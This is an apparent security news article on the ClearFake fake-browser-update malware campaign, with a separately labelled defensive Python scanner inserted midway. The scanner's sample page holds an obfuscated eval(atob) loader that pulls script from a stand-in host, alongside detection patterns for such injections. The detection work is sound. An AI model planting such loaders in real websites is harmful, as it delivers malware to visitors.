ClearFake Enters the Fake Browser Update Arena to Deliver Malware | Cyware Hacker News

Researchers have shared details of a new fake browser update threat that uses a new piece of malware called ClearFake to deliver malicious payloads onto victims’ devices. The campaign resembles the SocGholish and FakeSG campaigns, which also rely on social engineering to trick users into installing a bogus web browser update.

Modus operandi

The operators behind ClearFake use the watering hole technique, injecting malicious JavaScript into compromised WordPress sites.
  • As part of the tactic, visitors are first redirected through the Keitaro TDS filtering service before being served the fake browser update pages.
  • The fake update pages look realistic and mimic the download pages for Chrome, Edge, and Microsoft.
  • Once the victim clicks the update button, the page downloads payloads hosted on Dropbox and OneDrive.

Notably, SocGholish operators successfully used this same technique in 2022, which suggests that the same threat group is likely behind the new ClearFake malware.

Change in code injection method

In late September, ClearFake changed its code injection tactics. Previously, the injected code was a base64-encoded script added to the HTML of the compromised web pages; most recently, it has been observed relying on smart contracts on the Binance Smart Chain instead.
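As an added example (not code from the article or the researchers it cites), the following Python scanner checks a WordPress page's HTML for the two injection styles described above from a defender's side: inline scripts that decode a base64 blob into a second-stage script loader, and inline scripts that query a BNB Smart Chain JSON-RPC endpoint. The heuristics, hostname hints and the sample page are my assumptions, not indicators published with the campaign.

```python
import base64
import re
from html.parser import HTMLParser

# Hypothetical heuristics (my assumption, not indicators from the article): an inline
# script that decodes base64 into a second-stage loader, or one that queries a BNB Smart Chain RPC.
BSC_RPC_HINTS = ("bsc-dataseed", "eth_call")  # public BSC RPC hostname prefix / JSON-RPC method
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

class _ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False  # source of every src-less <script>
    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_inline_scripts(html):
    """Return (reason, snippet) findings for suspicious inline scripts in a page."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        if "atob(" in script or "eval(" in script:
            for blob in B64_BLOB.findall(script):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
                except ValueError:
                    continue  # not valid base64; ignore this quoted string
                if re.search(r"<script|document\.write|createElement\(['\"]script", decoded, re.I):
                    findings.append(("base64-encoded script loader", decoded[:80]))
        if any(hint in script for hint in BSC_RPC_HINTS):
            findings.append(("inline script querying BSC JSON-RPC", script.strip()[:80]))
    return findings

# Constructed sample page (not a real ClearFake injection): one legitimate inline
# script plus one instance of each suspicious pattern.
_LOADER = "document.write('<script src=\"https://update-check.example/u.js\"></script>')"
SAMPLE_HTML = f"""<html><body><h1>Blog</h1>
<script src="/wp-includes/js/jquery.js"></script>
<script>console.log("legit inline");</script>
<script>eval(atob("{base64.b64encode(_LOADER.encode()).decode()}"));</script>
<script>fetch("https://bsc-dataseed.binance.org/",{{method:"POST",body:JSON.stringify({{method:"eth_call"}})}});</script>
</body></html>"""
```

Run it over crawled copies of a site's pages and diff the findings against a known-good baseline; a legitimate page that suddenly gains either pattern is worth a closer look.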

A glance at fake browser updates landscape

Proofpoint has traced at least four distinct threat clusters using fake browser updates to distribute malware. One of these threats is linked to the ClearFake campaign.
  • Another attack campaign is associated with the SocGholish malware, which has been used for over five years to deliver AsyncRAT and NetSupport, among others.
  • Furthermore, a FakeSG campaign was used to deliver NetSupport RAT onto victims’ systems.
  • One more cluster of fake update campaigns was observed in June, with the emergence of SmartApeSG, which downloaded NetSupport RAT onto compromised systems.

The bottom line

As fake browser updates remain a viable method for malware delivery, organizations need to actively monitor their endpoints and networks to block such threats. Furthermore, the IOCs associated with the threat have been made available to help understand the attackers’ infrastructure, attack patterns, and activities.